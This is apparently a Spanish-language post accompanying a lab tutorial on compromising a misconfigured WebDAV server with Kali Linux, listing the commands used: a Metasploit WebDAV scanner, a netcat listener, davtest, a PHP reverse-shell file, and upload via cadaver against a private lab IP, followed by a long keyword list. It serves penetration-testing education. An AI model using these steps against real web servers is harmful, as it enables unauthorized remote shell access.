Así HACKEAN una PAGINA WEB | Kali Linux | Seguridad Informática
Publicado: 28 Dic 2021, 11:24
WebDAV, o Web Distributed Authoring and Versioning, es un protocolo que permite a los usuarios colaborar y editar contenido en la web de forma remota. Es una extensión de HTTP, pero utiliza sus propias características distintivas para mejorar los métodos y encabezados HTTP estándar. El protocolo se utiliza principalmente para la edición y la colaboración remotas, pero también se puede utilizar para transferir archivos. Por lo general, se ejecuta en el puerto 80 de forma predeterminada o, a veces, en el puerto 443 para comunicaciones cifradas. Si bien WebDAV ofrece a los usuarios la capacidad y la conveniencia de acceder al contenido web desde cualquier lugar, esta misma función remota puede ser un gran agujero de seguridad si no se configura correctamente. Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad
Laboratorio de Trabajo
Comandos usados
Código: Seleccionar todo
use auxiliary/scanner/http/webdav_scanner
nc -lvnp 9001
davtest -url http://192.168.1.180/webdav/
cd /usr/share/webshells
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
cadaver http://192.168.1.180/webdav/Installation and configuration How to install Instalacion Installation How to use Como usar Como Instalar Como buscar Como Encontrar How to find Remotely Pentesting python perl synology xpenology microsoft windows Security Technologies Apache Tomcat Nmap Sistema operativo Operating Systems Scanner Remote Remota Instalación y configuración Install and configure ssh DNS Java Script Realizar http https Metasploit Unauthenticated LAN Remote Code Execution Reverse connection Shell asp cgi perl backdoor php LAN | Local Area Network bypass CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability ransomware attackers Virtual Box ubuntu repository Netcat Listener Web Server python Exploit Code JNDI Firewall Java Class libreria html Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP learn security,unix,debian,OSINT,oscp certification,try hack me,hacking,ethical hacker,ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,penetration tests,herramienta,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,Information Systems Security Professional,como usar kali linux,LAN,network,Roger Biderbost,comandos,commands,java server page,remote function,davtest,ftp